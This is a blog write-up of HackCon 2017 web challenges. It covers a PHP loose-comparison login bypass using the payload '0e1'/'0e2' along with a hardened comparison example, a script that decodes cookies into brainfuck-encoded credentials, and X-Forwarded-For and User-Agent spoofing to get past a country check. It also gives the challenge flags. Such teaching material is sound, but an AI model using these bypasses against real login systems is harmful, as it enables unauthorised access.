Chybeta

HackCon2017-Web-writeup

Noobcoder

A junior recently started doing PHP, and makes some random shit. He uses gedit as his go-to editor with a black theme thinking it was sublime.
So he made this login portal, I am sure he must have left something out. Why don't you give it a try?
Server: http://defcon.org.in:6062
Note: dirbuster is NOT required for this question

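The file checker.php~ exists on the server (the backup copy gedit leaves behind when saving checker.php). Download it and open it: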

<?php
if ($_POST["username"] == $_POST["password"] && $_POST["password"] !== $_POST["username"])
echo "congratulations the flag is d4rk{TODO}c0de";
else
echo "nice try, but try again";
?>

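The check has a loose (weak-typed) comparison problem. Both values are numeric strings in exponent notation, so == compares them as numbers (0 == 0) while !== still sees two different strings. Payload: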

username=0e1&password=0e2

This returns the flag:

d4rk{l0l_g3dit_m4ster_roxx}c0de
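
The condition from checker.php~ next to a strict, string-only comparison, as an added example that is not part of the original post or the challenge code. The function names (`loose_check`, `post_string`, `strict_equal`) and the sample requests are constructed for illustration; running it prints, for each request, whether the page's condition holds and whether the two fields are actually equal.

```php
<?php
declare(strict_types=1);

// Added example, not code from the challenge. Function names and the sample
// requests below are constructed for illustration.

// The condition from checker.php~ as shown on the page: loose == then strict !==.
function loose_check($username, $password): bool
{
    return $username == $password && $password !== $username;
}

// Read a form field only if it is a plain string; anything else is rejected.
function post_string(array $post, string $key): ?string
{
    return isset($post[$key]) && is_string($post[$key]) ? $post[$key] : null;
}

// Hardened comparison: hash_equals() compares bytes in constant time and never
// converts numeric-looking strings to numbers.
function strict_equal(array $post, string $a, string $b): bool
{
    $x = post_string($post, $a);
    $y = post_string($post, $b);
    return $x !== null && $y !== null && hash_equals($x, $y);
}

// Constructed sample requests.
$requests = [
    ['username' => '0e1',   'password' => '0e2'],   // payload from the writeup
    ['username' => '1e1',   'password' => '10'],    // both numeric strings
    ['username' => '1.0',   'password' => '1'],     // both numeric strings
    ['username' => 'admin', 'password' => 'admin'], // identical strings
    ['username' => 'admin', 'password' => 'Admin'], // different strings
];

foreach ($requests as $post) {
    printf(
        "%-6s %-6s  checker.php condition: %-5s  strict equality: %s\n",
        $post['username'],
        $post['password'],
        var_export(loose_check($post['username'], $post['password']), true),
        var_export(strict_equal($post, 'username', 'password'), true)
    );
}
```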

Magic

Everything disappears magically.
Can you magically prevent that?
http://defcon.org.in:6060/index.php
Note: dirbuster is NOT required for this question

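There is a login form, but initial attempts did not reveal any injection.

Looking at the captured traffic, there are some odd Set-Cookie headers.

Save all of the Set-Cookie headers to cookie.txt and use a script to extract the characters from them: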

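import re
from urllib.parse import unquote

# Read the saved Set-Cookie headers
with open("cookie.txt", "r") as f:
    content = f.read()

# Each cookie value sits between '=' and '; expires='
cookie_re = re.compile(r'=(.+?); expires=')
cookie_list = cookie_re.findall(content)

# URL-decode each value and concatenate them in order
result = ""
for value in cookie_list:
    result += unquote(value)
print(result)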

Running it gives:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-------------.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.---------------.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.

Running this through a brainfuck interpreter:

λ .\brainfuck.exe
username: abERsdhw password: HHealskdwwpr

This gives the username and password. Log in to get the flag:

d4rk{c00k13s_4r3_fun}c0de

Dictator

A dictator is creating a lot of fuss nowadays by claiming to have nuclear weapons. I somehow got access to his personal website that he uses to send instructions, but I cannot get in. Can you try?
Link: Website(http://defcon.org.in:6063/)
Hint: you need to be living in that country to get access.
Hint2: north korea

Visiting the site directly returns Access denied, and changing Accept-Language does not help.

Set X-Forwarded-For to a North Korean IP address, and set User-Agent to NaenaraBrowser, the North Korean browser.

Stolen Calculator - PWN

I stole this calculator from someone and made some changes because I am the plagiarism god. Bow before me now.
btw wanna try it: http://defcon.org.in:9080/
Hint: This is a pwn challenge

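Post title: HackCon2017-Web-writeup

Author: chybeta

Published: 2017-08-27, 08:08

Last updated: 2017-08-29, 09:08

Original link: http://chybeta.github.io/2017/08/27/HackCon2017-Web-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please retain the original link and author when reposting.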